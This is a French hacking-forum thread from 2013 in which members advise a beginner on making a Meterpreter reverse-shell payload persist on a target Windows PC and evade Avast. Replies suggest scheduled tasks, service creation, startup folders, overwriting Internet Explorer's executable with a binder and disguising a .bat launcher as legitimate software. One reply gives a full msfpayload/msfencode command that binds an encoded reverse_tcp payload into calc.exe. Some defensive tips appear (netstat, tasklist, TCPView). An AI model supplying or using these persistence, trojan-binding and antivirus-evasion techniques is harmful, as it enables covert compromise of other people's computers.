Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 15-12-2013 13:55:06

Ayrton33
Nouveau membre
Inscription : 15-12-2013
Messages : 6

comment lancer une sessions meterpreter à chaque démarrage du pc cible

Bonjours a tous !

Alors voila j'ai :
-1 pc portable en dual boot windows 7 64bit et kali linux (wifi)
-1 pc fixe sous windows 7 avec AVAST internet security (wifi)
-le tout avec une Freebox révolution 

J'ai crée un PAYLOAD windows/meterpreter/reverse_tcp LPORT 4444 indétectable grâce au logiciel "Veil" et fait un pentest
qui c'est réalisé avec succès !

Maintenant j'aurai quelque question:

(1)Comment peut on faire pour que la payload ce lance au démarrage de l ordinateur cible ou a l exécution d'un programme comme internet explorer , steam ou autre ? j'ai bien-sur essayé "run persistence" mais avast supprime tout.

(2) y aurai t'il un moyen de le faire en contournant l'anti virus ?

(3) si oui comment s'en défendre en admettant que l'attaquant est migrer sur un autre programme et que l'anti virus n'y voit rien comment puis je faire pour le detecté et éliminé le payload ?

Je débute dans le domaine du pentest n'hésité pas a détailler , me donner beaucoup de lecture je suis très curieux et j'aime apprendre ! merci d'avance pour vos réponse

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 15-12-2013 14:40:02

JeanCharles
Membre Indétronable
Lieu : Sainte-Anne
Inscription : 13-07-2012
Messages : 199

Re : comment lancer une sessions meterpreter à chaque démarrage du pc cible

bonjour smile

1) Sur windows7 sans se prendre la tête, je dirais d'utiliser l'utilitaire "Planificateur De Taches" (taskschd.msc),
tu peux regarder ça aussi, c'est très enrichissant de comprendre windows big_smile

Fuji a écrit :

En fait, dans votre cas ici les gars il faudrait déclarer le meterpreter en tant que service Windows grâce à la commande SC, on peut voir comment [email protected] se sert pour rendre son exécutable permanent (et il faut la mériter disait-il, c'est vrai). Ce qui est intéressant, si je me souviens bien sans me tromper ça fait longtemps que j'ai oublié, c'est que cette commande n'a pas besoin du root pour ce travail et pouvant lancer un service en tant que system !

Il y a aussi le meterpreter sous forme de LOOP-VBS qui une fois lancé il est difficile de le killer, le Highlander de Metasploit. J'ai déjà eu affaire avec lui c'est un vrai emmerdeur ! il faut absolument supprimer son fichier sur le disque dur. Voici ce que fait Raz0r avec couplé à du HTTPS, un savant mélange entre Metasploit, SET et Ettercap afin de percer les lignes en territoire ennemi smile

--> La percee du meterpreter par Raz0r
Il y a des antiquités sur le forum qui valent une petite fortune.

2) Je ne vois pas où est le problème, si ton payload est fud, seule la clé HKLM du module persistence est "cramée" par avast.

3) avec une attaque en "reverse_tcp", un outil comme "netstat" suffit pour retrouver l'IP attaquante:)
il y à aussi wireshark pour analyser les paquets qui transitent sur ton réseau.
Mais bon, rien ne vaut un bon formatage de temps en temps smile


« γνωθι σεαυτον »

Hors Ligne

#3 15-12-2013 17:53:24

Ayrton33
Nouveau membre
Inscription : 15-12-2013
Messages : 6

Re : comment lancer une sessions meterpreter à chaque démarrage du pc cible

Merci d'avoir répondu rapidement

2: je me suis mal exprimé oui c'est bien la clé du module persistance qui est mis en quarantaine, le payload reste intacte

3:bien plus simple que je l'imaginai wink

Pour en revenir à ma 1ère questions  j'ai regarder un peux la commande sc.exe il faut les droits d'accès ...

Le planificateur de tache me semble une très bonne idée cependant pouvons nous planifier une tache a partir du shell si oui pouvons nous le faire sans que rien s'affiche sur le pc cible ?

Hors Ligne

#4 15-12-2013 18:13:39

JeanCharles
Membre Indétronable
Lieu : Sainte-Anne
Inscription : 13-07-2012
Messages : 199

Re : comment lancer une sessions meterpreter à chaque démarrage du pc cible

Ayrton33 a écrit :

Pour en revenir à ma 1ère questions  j'ai regarder un peux la commande sc.exe il faut les droits d'accès ...

Sans accès physique à la target, c'est une autre paire de manches pour gagner les droits...
Bon courage wink


« γνωθι σεαυτον »

Hors Ligne

#5 15-12-2013 18:22:49

Ayrton33
Nouveau membre
Inscription : 15-12-2013
Messages : 6

Re : comment lancer une sessions meterpreter à chaque démarrage du pc cible

Je me doute bien c'est toujours plus simple en ayant un accès physique au pc cible ! wink
je vais continué mes recherche merci

Hors Ligne

#6 15-12-2013 23:04:34

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : comment lancer une sessions meterpreter à chaque démarrage du pc cible

Bienvenue !

Ayrton33 a écrit :

(1)Comment peut on faire pour que la payload ce lance au démarrage de l ordinateur cible ou a l exécution d'un programme comme internet explorer , steam ou autre ? j'ai bien-sur essayé "run persistence" mais avast supprime tout.

(2) y aurai t'il un moyen de le faire en contournant l'anti virus ?

Tu peux expérimenter cette solution pour rendre FUD le script de la persistence.
Pour lancer le payload au démarrage d'une autre maniere et puisque tu as déjà réussi à compromettre ta cible moi à ta place j'aurais tendance à ramener l'exécutable de IE et le binder avec un second script Meterpreter, ensuite tu le remets à sa place en écrasant l'original, c'est plus simple JeanCharles smile
Tu peux tester ce Binder que j'adore comme ici et là.

Ayrton33 a écrit :

(3) si oui comment s'en défendre en admettant que l'attaquant est migrer sur un autre programme et que l'anti virus n'y voit rien comment puis je faire pour le detecté et éliminé le payload ?

Là il va falloir être très doué !  c'est une chose de savoir faire du prentest, c'en est une toute autre histoire de savoir comment corriger. Tu peux essayer de taper tasklist /svc  pour voir l’intérieur de chaque processus
ou Tasklist /m pour voir toutes les DLL et API utilisées par les processus afin de déceler la présence d'un Meterpreter caché après migration mais tu ne vas pas faire cela à chaque instant, en plus si Meterpreter est nommé par exemple svchost.exe hmm
tasklist /m > analyse.txt (pour voir en détails)

Fais comme Johnny !  allumes le pare-feu et aies l'envie d'avoir envie de filtrer tout ce qui sort wink

Hors Ligne

#7 16-12-2013 00:00:59

Ayrton33
Nouveau membre
Inscription : 15-12-2013
Messages : 6

Re : comment lancer une sessions meterpreter à chaque démarrage du pc cible

Fuji a écrit :

Tu peux expérimenter cette solution pour rendre FUD le script de la persistence.
Pour lancer le payload au démarrage d'une autre maniere et puisque tu as déjà réussi à compromettre ta cible moi à ta place j'aurais tendance à ramener l'exécutable de IE et le binder avec un second script Meterpreter, ensuite tu le remets à sa place en écrasant l'original, c'est plus simple JeanCharles smile
Tu peux tester ce Binder que j'adore comme ici et là.

Salut Fuji

Même si ces vrai que la solution du binder me semble bien plus facile, je pense que j 'éssayerai les deux méthodes dans la semaine wink

Fuji a écrit :

Là il va falloir être très doué !  c'est une chose de savoir faire du prentest, c'en est une toute autre histoire de savoir comment corriger. Tu peux essayer de taper tasklist /svc  pour voir l’intérieur de chaque processus
ou Tasklist /m pour voir toutes les DLL et API utilisées par les processus afin de déceler la présence d'un Meterpreter caché après migration mais tu ne vas pas faire cela à chaque instant, en plus si Meterpreter est nommé par exemple svchost.exe hmm
tasklist /m > analyse.txt (pour voir en détails)

Je me doute que si l'attaquant s'y prend bien sa peut poser quelque difficulté, mais c'est aussi le but
d'un pentest " apprendre a attaquer pour mieux ce défendre " smile

merci pour les conseils je post dès que j'aurai essayé tout ça !

Hors Ligne

#8 19-12-2013 00:43:47

Ayrton33
Nouveau membre
Inscription : 15-12-2013
Messages : 6

Re : comment lancer une sessions meterpreter à chaque démarrage du pc cible

Bon alors j'ai suivie t'as méthode Fuji j'ai essayé iexpress malheureusement sans succès Avast ne l'aime pas trop!! J'ai donc chercher d'autre logiciels de ce type mais j'en ai trouvé aucun FUD beaucoup de gens dise que c'est très rare et que la meilleur solution serai de le faire soit même et c'est assez compliqué !

Maintenant j'aurai une question qui va vous sembler peut être très c** mais j'aimerai avoir votre avis :
serai t'il possible de crée un fichier bat tous simple du style
start chrome.exe
start payload.exe

d'ensuite le convertir en fichier exe et changer sont apparence pour qu'il ressemble a un logiciel sains si cela fonctionne et que mon payload est fud sa remplacerai un binder non ?

Hors Ligne

#9 22-12-2013 21:35:03

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : comment lancer une sessions meterpreter à chaque démarrage du pc cible

C'est bizarre, parce que chez moi avec iexpress Avast lui il ferme sa gu**le, c'est comme tu me dis que lors du match d'hier j'ai vu sur ma télé la balle entrée dans le but, et moi je te dis sur ma télé j'ai vu la ballon passé au-dessus tongue donc résultat des courses: ton Meterpreter n'est pas FUD aux yeux d'Avast.

Moi j'ai suivi ta démarche selon laquelle tu as un accès via Meterpreter à l'ordi cible, c'est-à-dire que la manipulation ne doit se faire qu'à travers cette session. Il y a plusieurs façons de lancer/binder un exécutable sur Windows: il est possible de désassembler un programme cible et lui ajouter le code de Meterpreter, mais là il faut mettre les mains dans le cambouis et ce ne va pas être une partie de plaisir. Il y a aussi les variables d'environnement, le fichier autoexec.bat, ou tout simplement le répertoire de Démarrage voici comment...
Et il semble qu'il existe 76 emplacements pour le faire !!

Mais il ne faut pas oublié également que Metasploit offre la possibilité de binder son Meterpreter à des exécutables divers, et il le fait bien :

./msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.40 lport=4321 R | ./msfencode -t exe -x ~/calc.exe -k -o ~/test.exe -e x86/shikata_ga_nai -c 5

Ça permet de créer/encoder Meterpreter ainsi que de le binder avec la calculatrice calc.exe par exemple, donc tu peux changer ton exécutable à savoir IE. Le seul problème c'est qu'il y a ici deux programmes (msfpayload et msfencode) reliés par un pipe |, le premier crée et le deuxième encode et binde. Donc si tu présentes ton Meterpreter déjà encodé par tes propres soins à msfencode sans lui relier msfpayload ça ne va pas marcher hmm parce qu'il est censé attendre un fichier raw R et ça ton exe ne l'est pas, il faut passer par des manipulations fastidieuses pour y parvenir si je ne me trompe pas. Mais remarque que puisque le fichier final ainsi généré est un exe fais le passer à nouveau à la moulinette de ton crypter et regarde ce que ça donne, pour cela vire le (-e x86/shikata_ga_nai -c 5) tu peux le laisser mais ça sert à rien.

Et tu peux aussi faire un fichier .bat unissant deux exécutables, tu changeras ensuite son raccourci.

Pour revenir un petit peut à la surveillance comme tu voulais le savoir, il y a un tool très sympa qui va te permettre de surveiller les connexions sur ton ordi et ainsi agir sur celles-ci pour les fermer, si elles apparaissent suspecte. Par exemple, les adresses IP des abonnés commencent avec deux chiffres (78 pour Free, 93 pour SFR, etc.) et les serveurs avec trois chiffres (173 pour google, etc mais pas tous) donc à part le navigateur, si tu trouves qu'il y a un processus connecté et en plus sur une adresse avec deux chiffres, il faudrait voir en détails.

--> TCPView

Hors Ligne

#10 24-12-2013 00:34:12

Ayrton33
Nouveau membre
Inscription : 15-12-2013
Messages : 6

Re : comment lancer une sessions meterpreter à chaque démarrage du pc cible

Merci a toi Fuji

J'ai obtenue toute les réponses a mes question il me reste plus qu'a les appliqués .

merci d'avoir pris un peut de ton temps pour m expliqué tout cela en détail je vais testé tous ça wink !!

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.028 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]